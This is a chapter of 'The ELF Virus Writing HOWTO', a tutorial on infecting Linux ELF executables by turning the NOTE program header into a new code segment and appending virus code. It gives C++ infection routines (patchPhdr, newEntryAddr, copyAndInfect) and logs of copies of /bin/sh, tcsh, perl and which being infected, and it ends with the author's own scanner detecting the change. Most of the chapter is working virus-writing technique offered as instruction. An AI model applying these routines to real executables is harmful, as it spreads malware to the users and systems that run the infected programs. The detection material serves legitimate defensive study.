The ELF Virus Writing HOWTO
PrevNext

10. Additional code segments

 

If the code and the comments disagree, then both are probably wrong.

 Norm Schryer

In One step closer to the edge we inserted code into the gap between code and data segment. This loophole is rather small. And even worse, it is not too hard to check whether it is occupied. I still have no cure for that. Read the trail of my wrath.

Well, just kidding. But mindless rage is a good excuse for actions that are doomed from the start. Of course my pestiferous piece of Perl will detect the result of this chapter ("has 3 LOAD segments"). But then even the untrained eye can spot the difference in the output of readelf(1). So why is this done at all?

Because the method is very simple to implement and imposes no size limit on the code.

10.1. Magic of the GNU

Have a look at readelf(1)'s output on /bin/sh. The last program header is of type NOTE and has exactly 0x20 bytes. So what's in there?

Command: src/additional_cs/hexdump.sh 
#!/bin/sh
file=${1:-/bin/bash}
readelf -l ${file} \
| grep '^  *NOTE  *' \
| while read Type Offset VirtAddr PhysAddr FileSiz MemSiz rest
do
  ofs=$( echo "ibase=16; ${VirtAddr#0x} - 08048000" | bc )
  size=$( echo "ibase=16; ${FileSiz#0x}" | bc )
  hexdump -f src/format.hex -s ${ofs} -n ${size} < ${file}
done

Output: out/redhat-linux-i386/additional_cs/hexdump 
0108  04 00 00 00 10 00 00 00  01 00 00 00 47 4e 55 00  ............GNU.
0118  00 00 00 00 02 00 00 00  02 00 00 00 05 00 00 00  ................

It's the magic of the GNU. In this special case we can live without. But it's still interesting what LSB [1] has to say about it: [1]

Every executable shall contain a section named .note.ABI-tag of type SHT_NOTE. This section is structured as a note section as documented in the ELF spec. The section must contain at least the following entry. The name field (namesz/name) contains the string "GNU". The type field shall be 1. The descsz field shall be at least 16, and the first 16 bytes of the desc field shall be as follows.

The first 32-bit word of the desc field must be 0 (this signifies a Linux executable). The second, third, and fourth 32-bit words of the desc field contain the earliest compatible kernel version. For example, if the 3 words are 2, 2, and 5, this signifies a 2.2.5 kernel.

10.2. A simple plan

  1. Overwrite program header of type of NOTE with a code segment definition (type LOAD).

  2. Append virus code at end of file.

Having just 28 bytes, our unrealistic code is small enough to fit into the NOTE segment. But let's pretend this is a real example. I will reuse the framework from One step closer to the edge.

10.3. patchPhdr

Double infection is again impossible by design. If there is no PT_NOTE this target is out of reach.

Source: src/additional_cs/patch_phdr.inc 
bool Target::patchPhdr()
{
  Elf32_Phdr* note = phdr + 5;
  if (note->p_type != PT_NOTE)
    return false;

  note->p_type = PT_LOAD;
  /* align up multiple of 16 */
  note->p_offset = aligned_filesize;
  note->p_vaddr =
  note->p_paddr = newEntryAddr();
  note->p_filesz =
  note->p_memsz = sizeof(infection);
  note->p_flags = phdr[2].p_flags;
  note->p_align = phdr[2].p_align;
  return true;
}

10.4. newEntryAddr

We can use any memory region not already occupied. Using one below the magic base of 0x8048000 avoids trouble. See INFECTION_SIZE for an explanation of % 0x1000.

Source: src/additional_cs/new_entry_addr.inc 
unsigned Target::newEntryAddr()
{
  return 0x08000000 + aligned_filesize % 0x1000;
}

10.5. patchShdr

Not implemented. To cover the bytes of the new LOAD segment with a section we would have to insert a new one in the array of section headers. Right now I'm not in the mood to invest so much time in a hopeless case.

Source: src/additional_cs/patch_shdr.inc 
bool Target::patchShdr()
{
  return true; /* not implemented */
}

10.6. copyAndInfect

Source: src/additional_cs/copy_and_infect.inc 
bool Target::copyAndInfect()
{
  write(fd_dst, p.b, filesize); /* original target */
  lseek(fd_dst, aligned_filesize, SEEK_SET);

  unsigned code_size = writeInfection();
  fprintf(stderr, "wrote %u bytes, ", code_size);
  return true;
}

10.7. To serve & detect

Output: out/redhat-linux-i386/additional_cs/cc 
Infecting copy of /bin/tcsh... wrote 26 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 26 bytes, Ok
Infecting copy of /usr/bin/which... wrote 26 bytes, Ok
Infecting copy of /bin/sh... wrote 26 bytes, Ok

Output: out/redhat-linux-i386/additional_cs/test 
ELF/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/additional_cs/e3i1/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux

BFD: tmp/redhat-linux-i386/additional_cs/e3i1/sh_infected: warning: Empty loadable segment detected

out/redhat-linux-i386/additional_cs/test-e3i1.sh: line 11:  7760 Segmentation fault      (core dumped) tmp/redhat-linux-i386/additional_cs/e3i1/strip_sh_infected --version

The method works, but is not safe to strip(1). Well, on to readelf(1). Compare it with the original.

Output: out/redhat-linux-i386/additional_cs/segments 
-rwxr-xr-x    1 alba     anonymou   519994 Jun 30 00:06 tmp/redhat-linux-i386/additional_cs/e3i1/sh_infected

Elf file type is EXEC (Executable file)
Entry point 0x8059380
There are 6 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4
  INTERP         0x0000f4 0x080480f4 0x080480f4 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x79273 0x79273 R E 0x1000
  LOAD           0x079280 0x080c2280 0x080c2280 0x057e0 0x09bd0 RW  0x1000
  DYNAMIC        0x07e980 0x080c7980 0x080c7980 0x000e0 0x000e0 RW  0x4
  LOAD           0x07ef20 0x08000f20 0x08000f20 0x0001a 0x0001a R E 0x1000

 Section to Segment mapping:
  Segment Sections...
   00     
   01     .interp 
   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.got .rel.bss .rel.plt .init .plt .text .fini .rodata 
   03     .data .eh_frame .ctors .dtors .got .dynamic .bss 
   04     .dynamic 
   05

File size grew 519994 - 519964 = 30 bytes. But even an unmodified entry point is pointless in this case. Anybody can notice LOAD instead of NOTE.

Command: src/additional_cs/scan_dist.sh 
#!/bin/sh
echo	"/bin/bash
	${TMP}/additional_cs/e3i1/sh_infected" \
| src/scanner/dist.pl

Output: out/redhat-linux-i386/additional_cs/scan 
tmp/redhat-linux-i386/additional_cs/e3i1/sh_infected virtaddr=0x08000f20 dist=0xfff394c0
tmp/redhat-linux-i386/additional_cs/e3i1/sh_infected has 3 LOAD segments.
   2 files;    1 detected; min=0xfff394c0; max=0x0000100d

Case closed. Guilty of failure.

Notes

[1]

http://www.linuxbase.org/spec/gLSB/gLSB/noteabitag.html

PrevHomeNext
Remote shell trojan (RST) Doing it in C